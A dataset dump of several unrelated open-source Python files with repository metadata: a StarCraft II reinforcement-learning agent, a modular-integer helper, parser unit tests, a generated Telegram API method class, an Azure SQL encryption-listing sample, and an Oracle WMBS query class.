_SELECT_POINT = actions.FUNCTIONS.select_point.id
_UNIT_TYPE = 6
_SELECTED = 7
_UNIT_HIT_POINTS = 8
FUNCTIONS = actions.FUNCTIONS
_PLAYER_ENEMY = features.PlayerRelative.ENEMY
class BattleAgent(BaseRLAgent):
"""
Agent where the entire army is selected
"""
def __init__(self, save_name=None, load_name=None):
super(BattleAgent, self).__init__(save_name=save_name, load_name=load_name)
self.initialize_model(FeatureCNNFCBig(3, screen_size=self._screen_size))
self.steps_before_training = 5000
self.obs = None
self.features = [_PLAYER_RELATIVE, _UNIT_TYPE, _UNIT_HIT_POINTS]
self.train_q_per_step = 1
def run_loop(self, env, max_frames=0, max_episodes=10000, save_checkpoints=500, evaluate_checkpoints=10):
"""A run loop to have agents and an environment interact."""
total_frames = 0
start_time = time.time()
action_spec = env.action_spec()
observation_spec = env.observation_spec()
self.setup(observation_spec, action_spec)
try:
while self.n_episodes < max_episodes:
obs = env.reset()[0]
# remove unit selection from the equation by selecting the entire army on every new game.
select_army = actions.FunctionCall(_SELECT_ARMY, [[False]])
obs = env.step([select_army])[0]
self.reset()
episode_reward = 0
while True:
total_frames += 1
self.obs = obs.observation["feature_screen"][self.features]
s = np.expand_dims(self.obs, 0)
if max_frames and total_frames >= max_frames:
print("max frames reached")
return
if obs.last():
print(f"Episode {self.n_episodes + 1}:\t total frames: {total_frames} Epsilon: {self._epsilon.value()}")
self._epsilon.increment()
break
action = self.get_action(s, unsqueeze=False)
env_actions = self.get_env_action(action, obs, command=_ATTACK_SCREEN)
try:
obs = env.step([env_actions])[0]
r = obs.reward - 10
except ValueError as e:
print(e)
obs = env.step([actions.FunctionCall(_NO_OP, [])])[0]
r = obs.reward - 1000
episode_reward += r
s1 = np.expand_dims(obs.observation["feature_screen"][self.features], 0)
done = r > 0
if self._epsilon.isTraining:
transition = Transition(s, action, s1, r, done)
self._memory.push(transition)
if total_frames % self.train_q_per_step == 0 and total_frames > self.steps_before_training and self._epsilon.isTraining:
self.train_q(squeeze=True)
if total_frames % self.target_q_update_frequency == 0 and total_frames > self.steps_before_training and self._epsilon.isTraining:
self._Qt = copy.deepcopy(self._Q)
if evaluate_checkpoints > 0 and ((self.n_episodes % evaluate_checkpoints) - (evaluate_checkpoints - 1) == 0 or self.n_episodes == 0):
print('Evaluating...')
self._epsilon.isTraining = False # we need to make sure that we act greedily when we evaluate
self.run_loop(env, max_episodes=max_episodes, evaluate_checkpoints=0)
self._epsilon.isTraining = True
if evaluate_checkpoints == 0: # this should only activate when we're inside the evaluation loop
self.reward.append(episode_reward)
print(f'Evaluation Complete: Episode reward = {episode_reward}')
break
self.n_episodes += 1
if len(self._loss) > 0:
self.loss.append(self._loss[-1])
self.max_q.append(self._max_q[-1])
if self.n_episodes % save_checkpoints == 0:
if self.n_episodes > 0:
self.save_data(episodes_done=self.n_episodes)
except KeyboardInterrupt:
pass
finally:
print("finished")
elapsed_time = time.time() - start_time
try:
print("Took %.3f seconds for %s steps: %.3f fps" % (
elapsed_time, total_frames, total_frames / elapsed_time))
except:
print("Took %.3f seconds for %s steps" % (elapsed_time, total_frames))
class BattleAgentBeacon(BattleAgent):
def __init__(self, save_name=None, load_name=None):
super(BattleAgentBeacon, self).__init__(save_name=save_name, load_name=load_name)
self.initialize_model(BeaconCNN2())
self.features = _PLAYER_RELATIVE
def run_loop(self, env, max_frames=0, max_episodes=10000, save_checkpoints=500, evaluate_checkpoints=10):
"""A run loop to have agents and an environment interact."""
total_frames = 0
start_time = time.time()
action_spec = env.action_spec()
observation_spec = env.observation_spec()
self.setup(observation_spec, action_spec)
try:
while self.n_episodes < max_episodes:
obs = env.reset()[0]
# remove unit selection from the equation by selecting the entire army on every new game.
select_army = actions.FunctionCall(_SELECT_ARMY, [[False]])
obs = env.step([select_army])[0]
self.reset()
episode_reward = 0
while True:
total_frames += 1
self.obs = obs.observation["feature_screen"][self.features]
s = np.expand_dims(self.obs, 0)
if max_frames and total_frames >= max_frames:
print("max frames reached")
return
if obs.last():
print(f"Episode {self.n_episodes + 1}:\t total frames: {total_frames} Epsilon: {self._epsilon.value()}")
self._epsilon.increment()
break
action = self.get_action(s, unsqueeze=True)
env_actions = self.get_env_action(action, obs, command=_ATTACK_SCREEN)
try:
obs = env.step([env_actions])[0]
r = obs.reward - 10
except ValueError as e:
print(e)
obs = env.step([actions.FunctionCall(_NO_OP, [])])[0]
r = obs.reward - 1000
episode_reward += r
s1 = np.expand_dims(obs.observation["feature_screen"][self.features], 0)
done = r > 0
if self._epsilon.isTraining:
transition = Transition(s, action, s1, r, done)
self._memory.push(transition)
if total_frames % self.train_q_per_step == 0 and total_frames > self.steps_before_training and self._epsilon.isTraining:
self.train_q(squeeze=False)
if total_frames % self.target_q_update_frequency == 0 and total_frames > self.steps_before_training and self._epsilon.isTraining:
self._Qt = copy.deepcopy(self._Q)
if evaluate_checkpoints > 0 and ((self.n_episodes % evaluate_checkpoints) - (evaluate_checkpoints - 1) == 0 or self.n_episodes == 0):
print('Evaluating...')
self._epsilon.isTraining = False # we need to make sure that we act greedily when we evaluate
self.run_loop(env, max_episodes=max_episodes, evaluate_checkpoints=0)
self._epsilon.isTraining = True
if evaluate_checkpoints == 0: # this should only activate when we're inside the evaluation loop
self.reward.append(episode_reward)
print(f'Evaluation Complete: Episode reward = {episode_reward}')
break
self.n_episodes += 1
if len(self._loss) > 0:
self.loss.append(self._loss[-1])
self.max_q.append(self._max_q[-1])
if self.n_episodes % save_checkpoints == 0:
if self.n_episodes > 0:
self.save_data(episodes_done=self.n_episodes)
except KeyboardInterrupt:
pass
finally:
print("finished")
elapsed_time = time.time() - start_time
try:
print("Took %.3f seconds for %s steps: %.3f fps" % (
elapsed_time, total_frames, total_frames / elapsed_time))
except:
print("Took %.3f seconds for %s steps" % (elapsed_time, total_frames))
class BattleAgentLimited(BattleAgent):
def __init__(self, save_name=None, load_name=None):
super(BattleAgentLimited, self).__init__(save_name=save_name, load_name=load_name)
self.steps_before_training = 256
self.features = [_PLAYER_RELATIVE, _UNIT_TYPE, _UNIT_HIT_POINTS]
self.radius = 15
self._screen_size = 64
self.initialize_model(FeatureCNNFCLimited(len(self.features), self.radius, screen_size=64))
def get_action(self, s, unsqueeze=True):
# greedy
if np.random.rand() > self._epsilon.value():
s = torch.from_numpy(s).to(self.device)
if unsqueeze:
s = s.unsqueeze(0).float()
else:
s = s.float()
with torch.no_grad():
self._action = self._Q(s).squeeze().cpu().data.numpy()
return self._action.argmax()
# explore
else:
action = np.random.randint(0, self.radius ** 2)
return action
    def get_env_action(self, action, obs, command=_MOVE_SCREEN):
        # map the flat action index onto a (radius x radius) window centred
        # on the mean position of the friendly units
        relative_action = np.unravel_index(action, [self.radius, self.radius])
        y_friendly, x_friendly = (obs.observation["feature_screen"][_PLAYER_RELATIVE] == _PLAYER_FRIENDLY).nonzero()
        # y_enemy, x_enemy = (obs.observation["feature_screen"][_PLAYER_RELATIVE] == _PLAYER_HOSTILE).nonzero()
        if len(x_friendly) > 0:
            action = [int(relative_action[1] - self.radius/2 + round(x_friendly.mean())),
                      int(relative_action[0] - self.radius/2 + round(y_friendly.mean()))]
            friendly_coordinates = np.vstack((x_friendly, y_friendly)).T
            # if the target lands on one of our own units, or very close to
            # the screen origin, fall back to a plain move instead of an attack
            if bool(np.sum(np.all(action == friendly_coordinates, axis=1))):
                command = _MOVE_SCREEN
            elif abs(sum(action)) < 2:
                command = _MOVE_SCREEN
        else:
            # no friendly units on screen: nothing sensible to target
            # action = [int(relative_action[1] - self.radius/2), int(relative_action[0] - self.radius/2)]
            return actions.FunctionCall(_NO_OP, [])
        if command in obs.observation["available_actions"]:
            return actions.FunctionCall(command, [[0], action])
        else:
            return actions.FunctionCall(_NO_OP, [])
|
[
"alanzhou93@gmail.com"
] |
alanzhou93@gmail.com
|
39ef41ca372b8c23e5a544cffabddd8ade50fad0
|
bb462a56300aff06f6265e500804a4ecc7e290c4
|
/mod_int.py
|
74edcf9d02e8596531719f955e0156a7cf5b6c2b
|
[
"CC0-1.0"
] |
permissive
|
nohtaray/competitive-programming.py
|
6d4f0b5b6dde3dfee5a12674a1d0143d760b3644
|
7d38884007541061ddd69d617a69a0d9bc6176fa
|
refs/heads/master
| 2023-06-15T01:17:41.744771
| 2023-05-27T14:37:04
| 2023-05-27T14:37:04
| 180,506,267
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,170
|
py
|
def ModInt(mod):
class _ModInt:
def __init__(self, value):
self.value = value % mod
def __add__(self, other):
if isinstance(other, _ModInt):
return _ModInt(self.value + other.value)
else:
return _ModInt(self.value + other)
def __sub__(self, other):
if isinstance(other, _ModInt):
return _ModInt(self.value - other.value)
else:
return _ModInt(self.value - other)
def __radd__(self, other):
return self.__add__(other)
def __mul__(self, other):
if isinstance(other, _ModInt):
return _ModInt(self.value * other.value)
else:
return _ModInt(self.value * other)
def __truediv__(self, other):
raise NotImplementedError()
def __int__(self):
return self.value
def __repr__(self):
return str(self.value)
return _ModInt
if __name__ == '__main__':
MI7 = ModInt(mod=7)
assert int(MI7(1) + MI7(8)) == 2
assert int(MI7(1) + 8) == 2
assert int(8 + MI7(1)) == 2
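    # a hedged extension sketch: with a prime mod, __truediv__ could return
    # _ModInt(self.value * pow(other.value, mod - 2, mod)) by Fermat's little
    # theorem; multiplicative inverses already work through __mul__:
    assert int(MI7(3) * MI7(5)) == 1  # 5 is the inverse of 3 modulo 7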
|
[
"ydt.hran2@gmail.com"
] |
ydt.hran2@gmail.com
|
ef9b5b666e8749d77a7b64d744affbcd8a64a543
|
963cac9e78c4b742f7e7800200de8d1582799955
|
/test/veetou/parserTests.py
|
797c7be4f0f217a2fd7bbe13910a3ec1cd8fde32
|
[] |
no_license
|
ptomulik/veetou
|
c79ceb3ca3d7ef7b261b2219489b6f0a7a83e1fa
|
b30be2a604f4426f832ec9805547ecd6cc9083fe
|
refs/heads/master
| 2021-01-22T17:28:57.271251
| 2019-01-05T01:46:43
| 2020-05-04T16:23:44
| 85,016,513
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,386
|
py
|
#!/usr/bin/env python3
# -*- coding: utf8 -*-
import unittest
import veetou.parser as parser
class Test__Parser(unittest.TestCase):
    def test__functions_symbols__1(self):
self.assertIs(parser.dictmatcher , parser.functions_.dictmatcher)
self.assertIs(parser.fullmatch , parser.functions_.fullmatch)
self.assertIs(parser.fullmatchdict , parser.functions_.fullmatchdict)
self.assertIs(parser.ifullmatch , parser.functions_.ifullmatch)
self.assertIs(parser.imatch , parser.functions_.imatch)
self.assertIs(parser.imatcher , parser.functions_.imatcher)
self.assertIs(parser.match , parser.functions_.match)
self.assertIs(parser.matchdict , parser.functions_.matchdict)
self.assertIs(parser.matcher , parser.functions_.matcher)
self.assertIs(parser.permutexpr , parser.functions_.permutexpr)
self.assertIs(parser.reentrant , parser.functions_.reentrant)
self.assertIs(parser.scatter , parser.functions_.scatter)
self.assertIs(parser.search , parser.functions_.search)
self.assertIs(parser.searchpd , parser.functions_.searchpd)
self.assertIs(parser.skipemptylines , parser.functions_.skipemptylines)
def test__parsererror_symbols__1(self):
self.assertIs(parser.ParserError, parser.parsererror_.ParserError)
def test__parser_symbols__1(self):
self.assertIs(parser.Parser, parser.parser_.Parser)
self.assertIs(parser.RootParser, parser.parser_.RootParser)
def test__addressparser__1(self):
self.assertIs(parser.AddressParser, parser.addressparser_.AddressParser)
def test__contactparser__1(self):
self.assertIs(parser.ContactParser, parser.contactparser_.ContactParser)
def test__footerparser__1(self):
self.assertIs(parser.FooterParser, parser.footerparser_.FooterParser)
def test__headerparser__1(self):
self.assertIs(parser.HeaderParser, parser.headerparser_.HeaderParser)
def test__keymapparser__1(self):
self.assertIs(parser.KeyMapParser, parser.keymapparser_.KeyMapParser)
def test__pageparser__1(self):
self.assertIs(parser.PageParser, parser.pageparser_.PageParser)
def test__preambleparser__1(self):
self.assertIs(parser.PreambleParser, parser.preambleparser_.PreambleParser)
def test__reportparser__1(self):
self.assertIs(parser.ReportParser, parser.reportparser_.ReportParser)
def test__sheetparser__1(self):
self.assertIs(parser.SheetParser, parser.sheetparser_.SheetParser)
def test__summaryparser__1(self):
self.assertIs(parser.SummaryParser, parser.summaryparser_.SummaryParser)
def test__tableparser__1(self):
self.assertIs(parser.TableParser, parser.tableparser_.TableParser)
def test__tbodyparser__1(self):
self.assertIs(parser.TbodyParser, parser.tbodyparser_.TbodyParser)
def test__thparser__1(self):
self.assertIs(parser.ThParser, parser.thparser_.ThParser)
def test__trparser__1(self):
self.assertIs(parser.TrParser, parser.trparser_.TrParser)
if __name__ == '__main__':
unittest.main()
# Local Variables:
# # tab-width:4
# # indent-tabs-mode:nil
# # End:
# vim: set syntax=python expandtab tabstop=4 shiftwidth=4:
|
[
"ptomulik@meil.pw.edu.pl"
] |
ptomulik@meil.pw.edu.pl
|
9305c3a78026026cae6e03d11b5982d9cee7f094
|
0617c812e9bf58a2dbc1c1fef35e497b054ed7e4
|
/venv/Lib/site-packages/pyrogram/raw/functions/stats/get_megagroup_stats.py
|
320398dd3f9fb86f271aeb14aaca77b3bc298f8c
|
[] |
no_license
|
howei5163/my_framework
|
32cf510e19a371b6a3a7c80eab53f10a6952f7b2
|
492c9af4ceaebfe6e87df8425cb21534fbbb0c61
|
refs/heads/main
| 2023-01-27T14:33:56.159867
| 2020-12-07T10:19:33
| 2020-12-07T10:19:33
| 306,561,184
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,553
|
py
|
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetMegagroupStats(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``117``
- ID: ``0xdcdf8607``
Parameters:
channel: :obj:`InputChannel <pyrogram.raw.base.InputChannel>`
dark (optional): ``bool``
Returns:
:obj:`stats.MegagroupStats <pyrogram.raw.base.stats.MegagroupStats>`
"""
__slots__: List[str] = ["channel", "dark"]
ID = 0xdcdf8607
QUALNAME = "pyrogram.raw.functions.stats.GetMegagroupStats"
def __init__(self, *, channel: "raw.base.InputChannel", dark: Union[None, bool] = None) -> None:
self.channel = channel # InputChannel
self.dark = dark # flags.0?true
@staticmethod
def read(data: BytesIO, *args: Any) -> "GetMegagroupStats":
flags = Int.read(data)
dark = True if flags & (1 << 0) else False
channel = TLObject.read(data)
return GetMegagroupStats(channel=channel, dark=dark)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
flags = 0
flags |= (1 << 0) if self.dark is not None else 0
data.write(Int(flags))
data.write(self.channel.write())
return data.getvalue()
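    # a hedged usage sketch (not part of the generated schema): in Pyrogram
    # releases around layer 117 a raw function is dispatched with Client.send,
    # e.g.
    #
    #     peer = await app.resolve_peer("some_supergroup")
    #     stats = await app.send(GetMegagroupStats(channel=peer, dark=False))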
|
[
"houwei5163"
] |
houwei5163
|
3e43c121fa98f0c8fd7478f5ac8cd4cfe08fcd43
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/sql/azure-mgmt-sql/generated_samples/transparent_data_encryption_list.py
|
3e2275f884eabc284c7627538174b4de0a236e32
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,661
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.sql import SqlManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-sql
# USAGE
python transparent_data_encryption_list.py
    Before running the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = SqlManagementClient(
credential=DefaultAzureCredential(),
subscription_id="00000000-1111-2222-3333-444444444444",
)
response = client.transparent_data_encryptions.list_by_database(
resource_group_name="security-tde-resourcegroup",
server_name="securitytde",
database_name="testdb",
)
for item in response:
print(item)
# x-ms-original-file: specification/sql/resource-manager/Microsoft.Sql/preview/2022-08-01-preview/examples/TransparentDataEncryptionList.json
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
98afb32b4a54532746127c0a78d01a693fc7d98a
|
21899ea0e94cb58f8ac99b7c731f59e0232839eb
|
/src/python/T0/WMBS/Oracle/Subscriptions/HaveJobGroup.py
|
59ece2561182f2a6ec7589262150c04280d86513
|
[
"Apache-2.0"
] |
permissive
|
dmwm/T0
|
a6ee9d61abc05876fc24f8af69fe932a2f542d21
|
1af91d0b1971b7d45ea7378e754f2218ff9a8474
|
refs/heads/master
| 2023-08-16T10:55:27.493160
| 2023-08-11T09:38:03
| 2023-08-11T09:38:03
| 4,423,801
| 9
| 54
|
Apache-2.0
| 2023-09-14T11:43:30
| 2012-05-23T18:33:56
|
Python
|
UTF-8
|
Python
| false
| false
| 687
|
py
|
"""
_HaveJobGroup_
Oracle implementation of HaveJobGroup
For a given subscription check if there is an existing job group
"""
from WMCore.Database.DBFormatter import DBFormatter
class HaveJobGroup(DBFormatter):
sql = """SELECT 1
FROM wmbs_jobgroup
WHERE wmbs_jobgroup.subscription = :subscription
AND ROWNUM = 1
"""
def execute(self, subscription, conn = None, transaction = False):
results = self.dbi.processData(self.sql, { 'subscription' : subscription },
conn = conn, transaction = transaction)[0].fetchall()
return ( len(results) > 0 and results[0][0] == 1 )
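# A hedged usage sketch (DAOFactory wiring assumed from WMCore conventions;
# the names below are illustrative, not taken from this file):
#
#     haveJobGroup = daoFactory(classname = "Subscriptions.HaveJobGroup")
#     if haveJobGroup.execute(subscription = subscriptionId):
#         pass  # the subscription already has at least one job group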
|
[
"Dirk.Hufnagel@cern.ch"
] |
Dirk.Hufnagel@cern.ch
|